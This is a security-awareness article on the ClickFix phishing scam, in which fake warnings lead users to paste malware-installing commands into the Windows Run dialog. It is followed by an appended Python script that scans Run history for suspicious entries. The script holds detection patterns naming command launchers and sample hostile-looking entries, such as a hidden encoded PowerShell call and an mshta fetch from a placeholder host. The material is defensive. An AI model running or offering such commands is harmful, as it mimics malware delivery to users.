Beware of the ClickFix Scam!

TorchLight’s Threat Intelligence team has uncovered a resurgence of a phishing scam called ‘ClickFix,’ initially identified in late 2024 but now widely used by cybercriminals in 2025. This scam tricks users into installing malicious software that can steal sensitive data, such as financial and medical information and login credentials, and can even deploy ransomware.

Defending against ClickFix and similar threats is no easy feat. Phishing attacks have skyrocketed since 2023. In 2024 alone, over 932,000 unique phishing sites were detected worldwide. Phishing emails increased by 1,265%, and credential-stealing attacks grew by 967% compared to 2022. These numbers show that phishing attacks not only remain highly effective but are also evolving, becoming more complex and harder to detect.

How the ClickFix Attack Works

You might encounter fake warning messages while browsing or through phishing emails. These messages claim your computer is infected, needs an urgent update, or requires identity verification using tools like reCAPTCHA.

The attacker then instructs you to press the Win+R key combination and enter a command. This action downloads malware (such as AsyncRAT, Danabot, DarkGate, or Lumma Stealer) directly onto your computer, bypassing security measures. 

What Happens Next?

Initially, you may not notice any changes. However, within minutes, your computer could slow down, display error messages, or, in the worst cases, become completely locked with a ransomware note demanding payment. If that happens, don’t panic. If your computer suddenly slows down or displays unusual messages after following suspicious instructions, disconnect from the internet and report the issue to your organization’s Security or IT department. 

Why Are These Scams So Effective?

Scammers prey on fear, urgency, and FOMO (Fear of Missing Out). They manipulate you into acting quickly without thinking. Remember, taking a moment to verify a request can save you from major headaches, data loss and downtime.

How You Can Stay Protected

Don’t Follow Instructions from Unknown Sources: Legitimate websites or companies will never ask you to run commands on your computer. If you’re unsure, reach out to your IT or Security team immediately. 

If In Doubt, Take A Time Out: Slow down, collect your thoughts, and take the time to analyze the request, ideally using a different channel to confirm the urgent request.

Defending against phishing scams like ClickFix requires a combination of tools and practices, including:

  • Email Security and DNS Filtering: These block harmful links and emails before they reach you.
  • Antivirus and EDR (Endpoint Detection and Response): These detect and stop malware in real time.
  • Firewall Policies and Regular Updates: Keeping your systems patched and secure helps close vulnerabilities.
  • Phishing Awareness Training: Educating yourself and your team is critical to recognizing and avoiding scams.

Additionally, organizations should implement 24/7 monitoring of assets and user accounts to detect threats early and apply prompt mitigation actions to eliminate, quarantine or limit potential damage.
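
One way to monitor for the Win+R step described above, as an added example that is not part of the original article or any TorchLight tooling: Windows keeps each user's Run dialog history in the RunMRU registry key, and this Python script triages those entries. The indicator patterns and the sample entries are assumptions constructed for illustration.

```python
import re

# Per-user registry key (under HKCU) holding Run dialog (Win+R) history.
RUNMRU = r"Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"

# Assumed heuristics (not from the article): programs able to fetch or run
# remote content, and arguments that rarely appear in a hand-typed command.
LAUNCHERS = re.compile(
    r"\b(powershell|pwsh|cmd|mshta|wscript|cscript|curl|certutil|bitsadmin"
    r"|msiexec|rundll32|regsvr32)(\.exe)?\b", re.I)
INDICATORS = {
    "remote URL": re.compile(r"https?://", re.I),
    "encoded command": re.compile(r"\s-(e|ec|en[a-z]*)\s", re.I),
    "hidden window": re.compile(r"\s-w[a-z]*\s+(hidden|1)\b", re.I),
    "verification lure text": re.compile(r"captcha|not a robot|verif", re.I),
}

def triage(entry):
    """Return the reasons a Run dialog entry looks like ClickFix ([] if none)."""
    # RunMRU stores each command with a trailing "\1" marker; strip it.
    command = entry[:-2] if entry.endswith("\\1") else entry
    if not LAUNCHERS.search(command):
        return []
    return [name for name, rx in INDICATORS.items() if rx.search(command)]

def read_runmru():
    """Read the current user's Run history from the registry (Windows only)."""
    import winreg
    entries = []
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, RUNMRU) as key:
        for i in range(winreg.QueryInfoKey(key)[1]):
            name, value, _ = winreg.EnumValue(key, i)
            if name != "MRUList":  # MRUList only records ordering
                entries.append(value)
    return entries

# Constructed sample entries; the host and payload are placeholders.
SAMPLE = [
    "notepad\\1",
    "cmd\\1",
    "\\\\fileserver\\share\\1",
    "powershell -w hidden -enc PLACEHOLDER # reCAPTCHA verification ID 1234\\1",
    "mshta https://example.invalid/verify\\1",
]

if __name__ == "__main__":
    for entry in SAMPLE:  # on a Windows host, use read_runmru() instead
        print(entry, "->", triage(entry) or "ok")
```

Any entry that returns reasons is a prompt for the isolate-and-report steps above, since a hit means the command was already run from the Run dialog.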

By staying informed and cautious, you can protect yourself and your organization from evolving cyber threats. If you’d like to learn more about defending against advanced phishing attacks, contact us for expert advice and resources from our Managed Security Services team.

Credit to Proofpoint for making the initial discovery on this with additional victim stories.